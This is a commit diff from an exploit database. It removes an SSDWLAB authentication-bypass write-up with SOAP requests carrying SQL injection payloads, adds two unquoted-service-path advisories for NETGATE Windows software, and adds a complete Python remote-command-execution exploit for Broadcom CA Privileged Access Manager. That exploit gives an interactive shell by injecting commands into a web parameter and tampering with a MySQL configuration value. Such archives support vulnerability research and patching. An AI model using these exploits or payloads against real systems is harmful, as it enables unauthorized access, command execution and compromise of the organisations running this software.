DB: 2019-12-06

5 changes to exploits/shellcodes NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path Amiti Antivirus 25.0.640 - Unquoted Service Path SSDWLAB 6.1 - Authentication Bypass Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
2019-12-06 05:02:01 +00:00 · 2019-12-06 05:02:01 +00:00 · efa6ef060e
commit efa6ef060e
parent 6308ce9aab
5 changed files with 138 additions and 77 deletions
--- a/exploits/aspx/webapps/47742.txt
+++ b/exploits/aspx/webapps/47742.txt
@ -1,76 +0,0 @@
-# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
-# Date: 2019-10-01
-# Exploit Author: Luis Buendía (exoticpayloads)
-# Vendor Homepage: http://www.sbpsoftware.com/
-# Version: 6.1
-# Tested on: IIS 7.5
-# CVE : Pending
-#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.
-
-Request to the EditUserPassword Function
-
-POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
-Host: XXXXXXX.com
-Content-Type: text/xml; charset=utf-8
-Content-Length: 462
-SOAPAction: "http://tempuri.org/EditUserPassword"
-
-<?xml version="1.0" encoding="utf-8"?>
-<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
-  <soap:Body>
-    <EditUserPassword xmlns="http://tempuri.org/">
-      <coUser>' or 1=1 --</coUser>
-      <sOldPwd>string</sOldPwd>
-      <sNewPwd>string</sNewPwd>
-      <coLang>ENG</coLang>
-    </EditUserPassword>
-  </soap:Body>
-</soap:Envelope>
-
-Example of Response when injection is succesfull
-
-HTTP/1.1 200 OK
-Cache-Control: private, max-age=0
-Content-Type: text/xml; charset=utf-8
-X-AspNet-Version: 4.0.30319
-X-Powered-By: XXX.XXX
-Content-Length: 421
-
-<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><EditUserPasswordResponse xmlns="http://tempuri.org/"><EditUserPasswordResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /></EditUserPasswordResult></EditUserPasswordResponse></soap:Body></soap:Envelope>
-
-Request to Login After Successful Request
-
-POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
-Host: XXXXXXX.com
-User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: en-US,en;q=0.5
-Accept-Encoding: gzip, deflate
-Connection: close
-Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2
-Content-Type: text/xml; charset=utf-8
-SOAPAction: "http://tempuri.org/Login"
-Content-Length: 406
-
-<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
-  <SOAP-ENV:Body>
-    <tns:Login xmlns:tns="http://tempuri.org/">
-      <tns:sUser>' or 1=1 --</tns:sUser>
-      <tns:sPwd>string</tns:sPwd>
-      <tns:sLang>ENG</tns:sLang>
-    </tns:Login>
-  </SOAP-ENV:Body>
-</SOAP-ENV:Envelope>
-
-Example of succesfull login
-
-HTTP/1.1 200 OK
-Cache-Control: private, max-age=0
-Content-Type: text/xml; charset=utf-8
-Vary: Accept-Encoding
-X-AspNet-Version: 4.0.30319
-X-Powered-By: XXX.XXX
-Connection: close
-Content-Length: 422
-
-<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><LoginResponse xmlns="http://tempuri.org/"><LoginResult><ListMsg /><ErrLevel>0</ErrLevel><MetaData /><data>d62cc3c0b2e3413cb8b4a85b0fa6177b</data></LoginResult></LoginResponse></soap:Body></soap:Envelope>
--- a/exploits/windows/local/47746.txt
+++ b/exploits/windows/local/47746.txt
@ -0,0 +1,25 @@
+#Exploit Title: NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-12-04
+#Vendor Homepage : http://www.netgate.sk/
+#Link Software : http://www.netgate.sk/download/download.php?id=5
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc NGDatBckpSrv
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: NGDatBckpSrv
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : NETGATE Data Backup Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
--- a/exploits/windows/local/47747.txt
+++ b/exploits/windows/local/47747.txt
@ -0,0 +1,39 @@
+#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-12-04
+#Vendor Homepage : http://www.netgate.sk/
+#Link Software : https://www.netgate.sk/download/download.php?id=11
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc ScsiAccess
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AmitiAvHealth
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Amiti Antivirus Health Check
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\ZwX>sc qc AmitiAvSrv
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AmitiAvSrv
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Amiti Antivirus Engine Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
--- a/exploits/windows/webapps/47748.py
+++ b/exploits/windows/webapps/47748.py
@ -0,0 +1,71 @@
+# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
+# Author: Peter Lapp
+# Date: 2019-12-05
+# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
+# CVE: CVE-2018-9021 and CVE-2018-9022
+# Tested on: v2.8.2
+
+import urllib2
+import urllib
+import ssl
+import sys
+import json
+import base64
+
+
+ctx = ssl.create_default_context()
+ctx.check_hostname = False
+ctx.verify_mode = ssl.CERT_NONE
+
+
+def send_command(ip, cmd):
+    cmd = urllib.quote_plus(cmd)
+    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
+    request = urllib2.Request(url, None)
+    response = urllib2.urlopen(request, context=ctx)
+    result = json.load(response)
+    return result['responseData']
+
+def get_db_value():
+    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
+    db_value = send_command(ip,cmd)
+    db_value = db_value.split('\n')[1]
+    return db_value
+    
+def encode_payload(cmd):
+    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
+    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
+    return cmd
+    
+def restore_sql(value):
+    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
+    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
+    send_command(ip,cmd)
+    
+def main():
+    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
+	
+    if len(sys.argv) != 2:
+        print "Usage: xceedium_rce.py <target ip>"
+        sys.exit()
+
+    global ip
+    ip = sys.argv[1]
+    print 'Enter commands below. Type exit to quit'
+	
+    while True:
+        cmd = raw_input('# ')
+        if cmd == "exit":
+            sys.exit()
+        orig_value = get_db_value()
+        payload = encode_payload(cmd)
+        send_command(ip, payload)
+        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
+        output = send_command(ip, 'cat /tmp/output')
+        print output
+        restore_sql(orig_value)
+	
+
+
+if __name__ == "__main__":
+    main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10825,6 +10825,8 @@ id,file,description,date,author,type,platform,port
 47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
 47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml,
 47743,exploits/xml/local/47743.txt,"Microsoft Visual Basic 2010 Express - XML External Entity Injection",2019-12-04,ZwX,local,xml,
+47746,exploits/windows/local/47746.txt,"NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path",2019-12-05,ZwX,local,windows,
+47747,exploits/windows/local/47747.txt,"Amiti Antivirus 25.0.640 - Unquoted Service Path",2019-12-05,ZwX,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42053,6 +42055,6 @@ id,file,description,date,author,type,platform,port
 47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,
 47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,
-47742,exploits/aspx/webapps/47742.txt,"SSDWLAB 6.1 - Authentication Bypass",2019-12-04,"Luis Buendía",webapps,aspx,
 47744,exploits/hardware/webapps/47744.txt,"Cisco WLC 2504 8.9 - Denial of Service (PoC)",2019-12-04,SecuNinja,webapps,hardware,
 47745,exploits/php/webapps/47745.txt,"OwnCloud 8.1.8 - Username Disclosure",2019-12-04,"Daniel Moreno",webapps,php,
+47748,exploits/windows/webapps/47748.py,"Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution",2019-12-05,"Peter Lapp",webapps,windows,